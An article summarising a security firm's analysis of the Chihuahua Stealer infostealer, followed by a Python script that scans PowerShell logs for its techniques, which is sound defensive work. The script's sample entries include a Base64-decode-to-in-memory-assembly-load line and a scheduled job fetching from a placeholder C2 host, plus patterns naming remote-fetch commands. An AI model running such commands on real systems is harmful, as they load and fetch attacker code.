A new strain of infostealer has recently been identified, blending standard malware techniques with unusually advanced features. Known as Chihuahua Stealer, this .NET infostealer was first discovered by a Reddit user in April 2025 and later analyzed by G Data CyberDefense, who shared their findings in a report on May 13.
Despite its seemingly unsophisticated appearance, Chihuahua Stealer uses advanced methods including stealthy loading, scheduled task persistence, and a multi-staged payload. The infection chain is a multi-stage PowerShell process, triggered by an obfuscated PowerShell script hosted in a Google Drive document. This script uses Base64 encoding, hex-string obfuscation, and scheduled jobs to maintain persistence and retrieve additional payloads from command-and-control (C2) domains.
The multi-stage execution chain involves several steps, including a lightweight launcher executing a Base64-encoded PowerShell string, decoding and reconstructing a heavily obfuscated hex payload, establishing persistence by scheduling a job to contact C2 servers, and loading and executing the Chihuahua Stealer in-memory before cleaning up visible traces.
Once executed, the Chihuahua Stealer initiates its main logic by generating a unique identifier for the infected system based on the machine name and disk serial number. It then searches for browser and crypto wallet files and extracts credentials, cookies, autofill data, browsing history, sessions, and payment information.
After gathering the stolen information, the malware encrypts and compresses it into a “.chihuahua” archive using AES-GCM encryption. The encrypted data is then exfiltrated to an external server using a retry loop before wiping all evidence of its activity from the disk.
To mitigate the threat posed by Chihuahua Stealer, G Data CyberDefense recommends alerting on frequent scheduled PowerShell jobs with suspicious commands, hunting for unusual file extensions or marker files in directories like Recent or Temp, detecting Base64 decoding combined with .NET reflection in PowerShell logs, and flagging uncommon AES-GCM usage tied to outbound HTTPS traffic.
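The detection guidance above, turned into a runnable check as an added example (this is not code from the G Data report or the article): it scans constructed PowerShell script-block log text for Base64 decoding paired with .NET reflective loading and for scheduled jobs that fetch remote content, and hunts for the ".chihuahua" archive extension in Recent or Temp folders. The sample log entries, regexes, label names and the placeholder hostname are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample script-block log text (e.g. PowerShell event 4104 message bodies); not from the report.
SAMPLE_SCRIPT_BLOCKS = [
    # Benign admin activity: should not fire.
    "Get-Content C:\\ops\\config.json | ConvertFrom-Json",
    # Base64 decode fed straight into an in-memory .NET assembly load.
    "$b=[System.Convert]::FromBase64String($s);[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)",
    # Base64 decode alone is common in legitimate scripts and should not fire by itself.
    "$t=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($enc))",
    # Scheduled job whose body fetches from a remote host (hostname is a placeholder).
    "Register-ScheduledJob -Name Updater -ScriptBlock { Invoke-WebRequest http://c2.example.invalid/p }",
]

BASE64_DECODE = re.compile(r"FromBase64String", re.IGNORECASE)
REFLECTIVE_LOAD = re.compile(r"\[\s*(System\.)?Reflection\.Assembly\s*\]\s*::\s*Load", re.IGNORECASE)
SCHEDULED_JOB = re.compile(r"Register-ScheduledJob|New-ScheduledTask|schtasks(\.exe)?\s+/create", re.IGNORECASE)
REMOTE_FETCH = re.compile(r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadData)\b", re.IGNORECASE)


def classify_script_block(text: str) -> list[str]:
    """Return the detection labels that fire for one script-block log entry.

    Each label requires two indicators together, so routine Base64 handling or
    ordinary scheduled-task creation on its own does not generate an alert.
    """
    hits = []
    if BASE64_DECODE.search(text) and REFLECTIVE_LOAD.search(text):
        hits.append("base64_reflective_load")
    if SCHEDULED_JOB.search(text) and REMOTE_FETCH.search(text):
        hits.append("scheduled_job_remote_fetch")
    return hits


# Marker-file hunt: the stealer writes its archive with a ".chihuahua" extension.
MARKER_EXTENSIONS = {".chihuahua"}
WATCHED_DIRS = {"recent", "temp"}


def flag_marker_file(path: str) -> bool:
    """True for a file with a marker extension sitting directly in a Recent or Temp folder."""
    p = PureWindowsPath(path)
    return p.suffix.lower() in MARKER_EXTENSIONS and p.parent.name.lower() in WATCHED_DIRS


def triage(script_blocks: list[str], paths: list[str]) -> dict[str, list[str]]:
    """Run both checks and return only the items that fired, keyed by finding type."""
    findings: dict[str, list[str]] = {}
    for block in script_blocks:
        for label in classify_script_block(block):
            findings.setdefault(label, []).append(block)
    flagged = [p for p in paths if flag_marker_file(p)]
    if flagged:
        findings["marker_file"] = flagged
    return findings
```

In production the script-block text would come from the PowerShell Operational log (script block logging) and the paths from a file-system sweep; the two-indicator rules keep the false-positive rate manageable.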
By remaining vigilant and implementing these mitigation recommendations, organizations can better protect themselves against the sophisticated techniques employed by Chihuahua Stealer and similar advanced malware threats.